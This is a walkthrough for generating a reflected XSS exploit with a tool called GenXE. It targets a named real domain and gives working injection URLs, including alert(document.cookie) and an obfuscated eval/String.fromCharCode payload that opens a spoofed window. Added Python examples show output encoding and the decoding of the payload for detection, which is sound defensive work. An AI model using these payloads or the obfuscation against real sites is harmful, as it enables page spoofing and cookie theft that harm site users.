SimpleXssExploit
--> Shellscript-in-Another-Window Exploit

Walkthrough

SN:WS1-030921132200

Task Description
We have found an XSS on the domain alerts.securityfocus.com. The URL is:
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert(document.cookie)</script>

We want to open a new window with the following URL displayed:
http://alerts.securityfocus.com/ep/alerts-users/index.epl

And display the following HTML code in the new window:
This site may be<B> faked!<B>
That means we will execute the following script in the new window:
document.write("This site may be<B> faked!<B>");
setTimeout("document.close()",1000);


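The payload's leading "> is the whole story of the bug: the redirect_page parameter is reflected into a double-quoted HTML attribute without encoding, so the value closes the attribute and the tag and everything after it is parsed as markup. The Python below is an added example, not part of this walkthrough and not GenXE code; the hidden-input template and the field name are assumptions, since the page does not show the server-side code of index.epl. It renders the first payload through a vulnerable template and through the same template with HTML attribute encoding, then tokenizes both results the way a browser would to show that the hardened version keeps the value inside the attribute and still round-trips it unchanged.

```python
import html
from html.parser import HTMLParser

# The reflected parameter value from the first URL in the walkthrough (the page's own payload).
PAYLOAD = '"><script>alert(document.cookie)</script>'

# Hypothetical server-side template (assumption: the real index.epl is not shown on the page).
TEMPLATE = '<input type="hidden" name="redirect_page" value="%s">'


def render_vulnerable(redirect_page: str) -> str:
    """Reflect the parameter into a quoted attribute with no output encoding.

    A value beginning with '">' terminates the attribute and the tag, so the
    rest of the value is parsed by the browser as markup and script.
    """
    return TEMPLATE % redirect_page


def render_hardened(redirect_page: str) -> str:
    """Same template, with HTML attribute encoding applied at the output point.

    html.escape(quote=True) turns " into &quot; (and & < > ' likewise), so the
    value cannot terminate the attribute whatever it contains. The browser
    decodes the entities, so the form still submits the original string.
    """
    return TEMPLATE % html.escape(redirect_page, quote=True)


class _TagCollector(HTMLParser):
    """Record every start tag and its attributes as a browser tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []    # tag names in document order
        self.attrs = {}   # tag name -> {attribute: entity-decoded value}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs[tag] = dict(attrs)


def parse_tags(markup: str) -> _TagCollector:
    """Tokenize rendered markup. HTMLParser decodes entities in attribute
    values, so attrs['input']['value'] is what the server gets back on submit."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector


def is_broken_out(markup: str) -> bool:
    """The template emits exactly one tag; any other tag means the parameter
    escaped its attribute context."""
    return parse_tags(markup).tags != ["input"]


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        page = render(PAYLOAD)
        print(f"{label:10s} tags={parse_tags(page).tags} broken_out={is_broken_out(page)}")
        print("           ", page)
```

The check is deliberately structural rather than a string match for <script>: counting the tags the tokenizer produces catches any breakout, not just the one shown in this walkthrough.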
Step-By-Step Walkthrough

Step 1/4. Construct a simple XSS exploit that pops up an "alert" message box with the text genxea(genxem,genxem)genxea

http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert("genxea(genxem,genxem)genxea")</script>

Step 2/4. Open GenXE and choose to generate a Shellscript-in-Another-Window Exploit.

Step 3/4. Copy and paste to fill the three fields:
[1/3] SimpleXssExploit:
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>alert("genxea(genxem,genxem)genxea")</script>
[2/3] Script that initializes the DestW variable, that is:
DestW=window.open("http://alerts.securityfocus.com/ep/alerts-users/index.epl");
[3/3] Shellscript-in-Another-Window:
document.write("This site may be<B> faked!<B>");
setTimeout("document.close()",1000);

Step 4/4. Press the button.

At last, we get this:
http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>eval("eval(String.fromCharCode(68,101,115,116,87,61,110,117,108,108,59,101,118,97,108,40,117,110,101,115,99,97,112,101,40,39,68,101,115,116,87,37,51,68,119,105,110,100,111,119,46,111,112,101,110,37,50,56,37,50,50,104,116,116,112,37,51,65,47,47,97,108,101,114,116,115,46,115,101,99,117,114,105,116,121,102,111,99,117,115,46,99,111,109,47,101,112,47,97,108,101,114,116,115,45,117,115,101,114,115,47,105,110,100,101,120,46,101,112,108,37,50,50,37,50,57,37,51,66,39,41,41,59,102,117,110,99,116,105,111,110,32,69,120,101,99,117,116,101,83,97,119,40,41,123,105,102,40,68,101,115,116,87,33,61,110,117,108,108,41,123,68,101,115,116,87,46,115,101,116,84,105,109,101,111,117,116,40,117,110,101,115,99,97,112,101,40,39,100,111,99,117,109,101,110,116,46,119,114,105,116,101,37,50,56,37,50,50,84,104,105,115,37,50,48,115,105,116,101,37,50,48,109,97,121,37,50,48,98,101,37,51,67,66,37,51,69,37,50,48,102,97,107,101,100,37,50,49,37,51,67,66,37,51,69,37,50,50,37,50,57,37,51,66,37,48,65,115,101,116,84,105,109,101,111,117,116,37,50,56,37,50,50,100,111,99,117,109,101,110,116,46,99,108,111,115,101,37,50,56,37,50,57,37,50,50,37,50,67,49,48,48,48,37,50,57,37,51,66,39,41,44,49,41,59,68,101,115,116,87,61,110,117,108,108,59,125,101,108,115,101,123,115,101,116,84,105,109,101,111,117,116,40,39,69,120,101,99,117,116,101,83,97,119,40,41,39,44,49,48,48,41,59,125,125,69,120,101,99,117,116,101,83,97,119,40,41,59))")</script>

It works as we expected.
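From the defender's side, the final URL above is what lands in a web-server or proxy log: the plaintext of steps 1 to 3 is gone and only eval("eval(String.fromCharCode(...))") remains, so a rule that looks for window.open or document.write on the raw request line does not fire. The Python below is an added analysis example, not part of this walkthrough and not GenXE code. It takes the request URL exactly as printed above, pulls out the reflected parameter, and peels the two encoding layers GenXE applied here, String.fromCharCode(...) and unescape('...'), until nothing changes, then reports which script indicators become visible. The indicator list is an assumption chosen for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request URL exactly as printed at the end of the walkthrough (the page's own payload).
URL = 'http://alerts.securityfocus.com/ep/alerts-users/index.epl?cid=1&redirect_page="><script>eval("eval(String.fromCharCode(68,101,115,116,87,61,110,117,108,108,59,101,118,97,108,40,117,110,101,115,99,97,112,101,40,39,68,101,115,116,87,37,51,68,119,105,110,100,111,119,46,111,112,101,110,37,50,56,37,50,50,104,116,116,112,37,51,65,47,47,97,108,101,114,116,115,46,115,101,99,117,114,105,116,121,102,111,99,117,115,46,99,111,109,47,101,112,47,97,108,101,114,116,115,45,117,115,101,114,115,47,105,110,100,101,120,46,101,112,108,37,50,50,37,50,57,37,51,66,39,41,41,59,102,117,110,99,116,105,111,110,32,69,120,101,99,117,116,101,83,97,119,40,41,123,105,102,40,68,101,115,116,87,33,61,110,117,108,108,41,123,68,101,115,116,87,46,115,101,116,84,105,109,101,111,117,116,40,117,110,101,115,99,97,112,101,40,39,100,111,99,117,109,101,110,116,46,119,114,105,116,101,37,50,56,37,50,50,84,104,105,115,37,50,48,115,105,116,101,37,50,48,109,97,121,37,50,48,98,101,37,51,67,66,37,51,69,37,50,48,102,97,107,101,100,37,50,49,37,51,67,66,37,51,69,37,50,50,37,50,57,37,51,66,37,48,65,115,101,116,84,105,109,101,111,117,116,37,50,56,37,50,50,100,111,99,117,109,101,110,116,46,99,108,111,115,101,37,50,56,37,50,57,37,50,50,37,50,67,49,48,48,48,37,50,57,37,51,66,39,41,44,49,41,59,68,101,115,116,87,61,110,117,108,108,59,125,101,108,115,101,123,115,101,116,84,105,109,101,111,117,116,40,39,69,120,101,99,117,116,101,83,97,119,40,41,39,44,49,48,48,41,59,125,125,69,120,101,99,117,116,101,83,97,119,40,41,59))")</script>'

# Substrings whose appearance after decoding tells the analyst what the script does
# (indicator list chosen for this example).
INDICATORS = ("window.open(", "document.write(", "document.close(", "setTimeout(", "document.cookie")

_FROMCHARCODE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
_UNESCAPE = re.compile(r"""unescape\((['"])(.*?)\1\)""")
_PERCENT_U = re.compile(r"%u([0-9A-Fa-f]{4})")


def reflected_param(url: str, name: str) -> str:
    """Pull one query parameter out of a logged request URL."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)[name][0]


def decode_fromcharcode(js: str) -> str:
    """Replace each String.fromCharCode(n,n,...) with the string it evaluates to."""
    return _FROMCHARCODE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), js)


def js_unescape(s: str) -> str:
    """Emulate JavaScript unescape(): %uXXXX is a UTF-16 code unit, %XX a Latin-1 byte."""
    s = _PERCENT_U.sub(lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s, encoding="latin-1")


def resolve_unescape(js: str) -> str:
    """Replace each unescape('...') call with the decoded literal it yields."""
    return _UNESCAPE.sub(lambda m: js_unescape(m.group(2)), js)


def unpack_stages(script: str, max_rounds: int = 10) -> list:
    """Apply both decoders in turn until the text stops changing.

    Returns every intermediate form, raw input first, so each layer can be
    inspected; max_rounds bounds the loop on hostile input.
    """
    stages = [script]
    for _ in range(max_rounds):
        before = stages[-1]
        for decode in (decode_fromcharcode, resolve_unescape):
            after = decode(stages[-1])
            if after != stages[-1]:
                stages.append(after)
        if stages[-1] == before:
            break
    return stages


def indicators_in(text: str) -> list:
    """Indicators present in a (possibly still encoded) script, in INDICATORS order."""
    return [i for i in INDICATORS if i in text]


if __name__ == "__main__":
    raw = reflected_param(URL, "redirect_page")
    stages = unpack_stages(raw)
    print(f"{len(stages) - 1} decoding stage(s) peeled")
    print("indicators in raw request :", indicators_in(raw))
    print("indicators after decoding :", indicators_in(stages[-1]))
    print(stages[-1])
```

Run against the URL above, the raw parameter yields no indicators at all, while the fully decoded stage exposes the window.open(...) call with its target URL, the document.write(...) of the "faked" text, and the document.close() timer, which is why detection on encoded payloads has to happen after decoding (or on the eval/String.fromCharCode/unescape pattern itself) rather than on the plaintext keywords.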